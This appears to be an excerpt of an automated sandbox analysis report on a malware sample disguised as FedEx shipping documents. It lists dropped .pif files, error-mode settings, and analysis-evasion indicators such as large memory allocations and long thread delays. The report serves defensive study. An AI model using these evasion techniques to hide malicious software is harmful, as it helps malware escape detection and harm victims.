Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 3040000 memory commit 500068352	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 3041000 memory commit 500154368	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 3066000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 3067000 memory commit 500068352	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 3077000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 316F000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 3170000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 2FA0000 memory commit 500068352
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 2FA1000 memory commit 500154368
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 2FC6000 memory commit 500002816
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 2FC7000 memory commit 500068352
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 2FD7000 memory commit 501014528
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 30CF000 memory commit 500006912
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: 30D0000 memory commit 500015104
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: 2D50000 memory commit 500068352	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: 2D51000 memory commit 500154368	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: 2D76000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: 2D77000 memory commit 500068352	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: 2D87000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: 2E7F000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: 2E80000 memory commit 500015104	Jump to behavior

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 29390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 29710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 2B710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 25740000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 25C80000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 25B80000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 2A590000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 2A8C0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Memory allocated: 2C8C0000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

7_2_004019F0

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Code function: 7_3_2BDBEE1A sldt word ptr [eax]

7_3_2BDBEE1A

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599880	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598058	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597720	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596592	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596479	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596365	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596123	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595577	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594370	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599874
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599764
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599655
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599436
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599327
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599217
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598888
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598781
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598671
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598535
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598406
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598295
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598175
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597641
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597468
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597249
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597137
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596954
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596848
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596720
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596595
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596468
